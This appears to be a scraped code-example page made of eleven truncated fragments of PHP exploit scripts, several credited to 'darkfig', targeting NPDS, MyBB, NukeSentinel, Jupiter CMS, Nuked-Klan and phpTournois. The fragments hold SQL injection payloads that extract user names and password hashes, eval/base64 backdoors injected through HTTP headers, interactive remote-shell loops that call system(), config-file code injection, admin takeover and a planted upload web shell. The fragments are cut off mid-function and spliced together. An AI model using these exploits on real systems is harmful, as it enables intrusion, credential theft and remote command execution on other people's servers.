Esempio n. 1
function main()
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    // Target
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        // Authentication
        if ($pra) {
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess !
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            print "\nFailed";
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
Esempio n. 2
# 212. $file = fopen("config.php","w");
# 401. $content .= "\$perpage = $xperpage;\n";
# 402. $content .= "\$popular = $xpopular;\n";...
# 614. fwrite($file, $content);
# 615. fclose($file);
# Default config value
# You can get the config here ./admin.php?op=Configure
$config = array(frmdt_url => $url . 'admin.php', "xparse" => "1", "xgzhandler" => "0", "xfilemanager" => "0", "xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000", "xsitename" => "NPDS SABLE", "xTitlesitename" => "NPDS - générateur de portail Php / Mysql en Open Source", "xnuke_url" => "", "xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif", "xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005", "xtop" => "10;{$PHPCODE}", "xstoryhome" => "10", "xoldnum" => "10", "xultramode" => "1", "xanonymous" => "Anonyme", "xanonpost" => "0", "xtroll_limit" => "6", "xmod_admin_news" => "0", "xnot_admin_count" => "1", "xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito", "xlanguage" => "french", "xmulti_langue" => "false", "xlocale" => "french", "xlever" => "08:00", "xcoucher" => "20:00", "xgmt" => "", "xbanners" => "0", "xmyIP" => "", "xfoot4" => "", "xbackend_title" => "NPDS", "xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont déposés, les commentaires sont sous la responsabilité de ceux qui les ont publiés, le reste @", "xfoot2" => "Ce site a été construit avec <a href= CLASS=NOIR>NPDS</a>, un système de portail écrit en PHP. Ce logiciel est sous <a href= CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "", "xbackend_width" => "88", "xbackend_height" => "31", "xperpage" => "10", "xpopular" => "10", "xnewlinks" => "10", "xtoplinks" => "10", "xlinksresults" => "10", "xlinks_anonaddlinklock" => "0", "xlinkmainlogo" => "0", "xOnCatNewLink" => "1", "xadminmail" => "", "xmail_fonction" => "1", "xEmailFooter" => "", "xnotify" => "0", "xnotify_email" => "*****@*****.**", "xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !", "xnotify_from" => "webmaster", "xmoderate" => "1", "xcommentlimit" => "4096", "xmaxOptions" => "12", "xBarScale" => "1", "xsetCookies" => "1", "xpollcomm" => "1", "xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/", "xadminimg" => "images/admin/", "xadmingraphic" => "0", "xadmf_ext" => "gif", "xshort_menu_admin" => "1", "xsite_font" => "Verdana, Arial, Helvetica", "xadmart" => "10", "xminpass" => "5", "xshow_user" => "20", "xsmilies" => "1", "xavatar_size" => "60*80", "xshort_user" => "0", "xAutoRegUser" => "1", "xmemberpass" => "1", "xsubscribe" => "1", "xmember_invisible" => "0", "xCloseRegUser" => "0", "xhttpref" => "1", "xhttprefmax" => "1000", "xmember_list" => "0", "xdownload_cat" => "Tous", "xshort_review" => "0", "xrss_host_verif" => "false", "xcache_verif" => "true", "xdns_verif" => "false", "xsavemysql_size" => "256", "xsavemysql_mode" => "1", "xtiny_mce" => "true", "op" => "ConfigSave");
# 0_o my website has been reset
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    $xpl->addheader("Referer", "@system({$cmd});die;");
    $xpl->get($url . 'config.php');
    print $xpl->getcontent() . "\n\$shell> ";
function getparam($param, $opt = '')
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
    if ($opt) {
        exit("\n-{$param} parameter required");
    } else {
Esempio n. 3
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
    die("\nsploit> Can't retrieve the forum id");
$forumid = $fid[1][count($fid[1]) - 1];
$xpl->get($url . "myadmin.php?choix=1&action=hide_forum&id={$forumid}");
print "\nsploit> Done\nstatus> Trying to include the picture\n\$shell> ";
if (empty($avatarur)) {
    $avatarur = "./avatar/{$name}.jpg";
$xpl->post($url . "myadmin.php?action=rec_perso&id={$forumid}&choix=3", "PARAM%5Btop_url%5D={$avatarur}");
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    $xpl->addheader("Referer", $cmd);
    $xpl->get($url . $name . '.php');
    $data = explode("337666733", $xpl->getcontent());
    print $data[1] . "\n\$shell> ";
 * Copyright (C) darkfig
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
Esempio n. 4
if ($pra) {
print "0x01>Deleting the file";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
print "\n0x04>Creating the file";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
do {
    $xpl->addheader('Shell', "@system({$cmd});");
    $xpl->get($url . 'dirsys/');
    print $xpl->getcontent() . "\n0x06>";
} while (!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));
function getparam($param, $opt = '')
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
    if ($opt) {
    } else {
Esempio n. 5
#   dateline: 1175443967
# lastactive: 1175444369
# $xpl->addheader('Client-IP','');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
print "\nAdmin IP : ";
$ip = sql_inject('ip');
print "\nAdmin sid: ";
$sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid={$sid}");
# Trying to find the language
if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) {
    $lang = $langmatches[1];
} else {
    $lang = 'english';
print "\nLanguage: {$lang}";
# Language configuration
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
Esempio n. 6
# +nukesentinel.php
# 49.  if($ab_config['disable_switch'] > 0) { return; }
# 414. if($ab_config['track_active'] == 1 AND !is_excluded($nsnst_const['remote_ip'])) {
# 458. $db->sql_query("INSERT INTO `".$prefix."_nsnst_tracked_ips` (`user_id`, `username`, `date`, `ip_addr`, `ip_long`, `page`,
#                     `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`, `remote_port`, `request_method`,
#                     `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
#                     '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
#                     '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
#                     '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
# We insert a row in $prefix."_nsnst_tracked_ips".
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP", "");
$xpl->get($url . 'index.php');
# Trying to find a valid tid.
# Needed for $tum > 0.
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
    $xpl->get($url . "includes/nsbypass.php?tid={$c}");
    if (!preg_match("", $xpl->getheader())) {
        $tid = $c;
        print "\nValid tid found: {$tid}\nHash: {$login} -> ";
    if ($c == $nbtst) {
Esempio n. 7
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
/* Change homepage to our avatar, with a null byte, after saving website name. */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&"******"done\n";
$success = true;
if ($mode == 0) {
    print " * loading uploader\t";
    $xpl->addheader("upload", "1");
    if (preg_match("#upfiledone#i", $xpl->get($url))) {
        print "done\n";
    } else {
        $success = false;
        print "error\n";
} else {
    print "\n\$shell> ";
    while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
        $xpl->addheader('Shell', "system('{$cmd}');");
        $data = explode('123456789', $xpl->getcontent());
        print $data[1] . "\n\$shell> ";
Esempio n. 8
$mode = getparam("mode") ? getparam("mode") : 0;
$adm = getparam("admin");
$acc = getparam("user");
$prx = getparam("proxy");
$prefix = getparam("prefix") ? getparam("prefix") : "nuked_";
$file_upload_code = getparam("file") ? file_get_contents(getparam("file")) : '<?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"></center></form>';
$date = array(date('Y'), date('m'), date('d'));
$xpl = new phpsploit();
if ($prx) {
/* Admin account defined */
if ($adm) {
    print "[*] Using admin account {$adm}\n";
    list($login, $passwd) = explode(":", $adm);
    $xpl->addheader("Referer", $url);
    $c = $xpl->post($url . "index.php?file=User&{$prefix}nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
    if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
        $admin_sid = $sid[1];
        $admin_uid = $uid[1];
        print "      SID -> {$admin_sid}\n";
        print "      UID -> {$admin_uid}\n";
        finalattack($admin_sid, $admin_uid);
    } else {
        exit("[*] Can't log in\n");
} else {
    /* User account defined */
    if ($acc) {
        print "[*] Using user account {$acc}\n";
        list($login, $passwd) = explode(":", $acc);
Esempio n. 9

Title:          Jupiter CMS 1.1.5 SQL Injection Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$hev = "-1' UNION SELECT CONCAT('" . "[BEGIN_XPL_USER]'," . "(SELECT username FROM users LIMIT 0,1),'" . "[END_XPL_USER]','" . "[BEGIN_XPL_PWD]'," . "(SELECT password FROM users LIMIT 0,1),'" . "[END_XPL_PWD]'),1 #";
$xpl->addheader("Client-IP", $hev);
preg_match("#\\[BEGIN_XPL_USER\\](.*)\\[END_XPL_USER\\]#", $xpl->getcontent(), $usr);
preg_match("#\\[BEGIN_XPL_PWD\\]([a-z0-9]{32})\\[END_XPL_PWD\\]#", $xpl->getcontent(), $pwd);
print $usr[1] . '::' . $pwd[1];
 * Copyright (C) darkfig
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
Esempio n. 10
$config[] = 'nuked';
# cookie prefix
$config[] = 'ORDER by date LIMIT 1';
# sql conditions
$config[] = 'HAK';
# match, length <= 3
$config[] = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
$request = array();
$request[] = "'{$config['3']}0',(SELECT pseudo FROM {$config['0']}_users {$config['2']}),'{$config['3']}0'";
$request[] = "'{$config['3']}1',(SELECT pass FROM {$config['0']}_users {$config['2']}),'{$config['3']}1'";
$request[] = "'{$config['3']}2',(SELECT id FROM {$config['0']}_users {$config['2']}),'{$config['3']}2'";
$request[] = "'{$config['3']}3',(SELECT id FROM {$config['0']}_sessions WHERE user_id=(SELECT id FROM {$config['0']}_users {$config['2']})),'{$config['3']}3'";
for ($i = 0; $i < count($request); $i++) {
    $deb = rand(0, 10000) . "',2," . (time() + 500000) . ",'',(SELECT CONCAT(";
    $sql = $deb . $request[$i] . "))) #";
    $xpl->addheader("X-Forwarded-For", $sql);
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
    die("Exploit Failed");
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
    print "\n" . $what[$i] . " -> " . $matches[2][$i];
if (empty($matches[2][3])) {
    exit("\nNo session found");
# Logged in as admin
$name = array("admin_session", "user_id", "sess_id");
Esempio n. 11
# 1056.  $display_page = abget_template($blocker_row['template']); // $blocker_row['template'] ... 6,7,--->'../config.php'<---,9
# 1004. function abget_template($template="") {
# 1013.  $filename = "abuse/".$template; // $template = ../config.php
# 1014.  if(!file_exists($filename)) { $filename = "abuse/abuse_default.tpl"; }
# 1015.  $handle = @fopen($filename, "r");
# 1016.  $display_page = fread($handle, filesize($filename));
# 1017.  @fclose($handle);
# 1041.  return $display_page;
# 1042. }
# Interesting isn't it ? :]
$sql = "' UNION SELECT 1,2,3,4,5,6,7," . mysqlchar("' UNION SELECT -666,2,3,4,5,6,7,'../{$file}',9,10,11 ORDER BY blocker #") . ",9,10,11,12,13,14,15,16,17,18#";
$xpl->addheader("Client-IP", $sql);
$xpl->get($url . 'index.php');
print $xpl->getcontent();
function mysqlchar($data)
    $char = 'CHAR(';
    for ($i = 0; $i < strlen($data); $i++) {
        $char .= ord($data[$i]);
        if ($i != strlen($data) - 1) {
            $char .= ',';
    return $char . ')';
function getparam($param, $opt = '')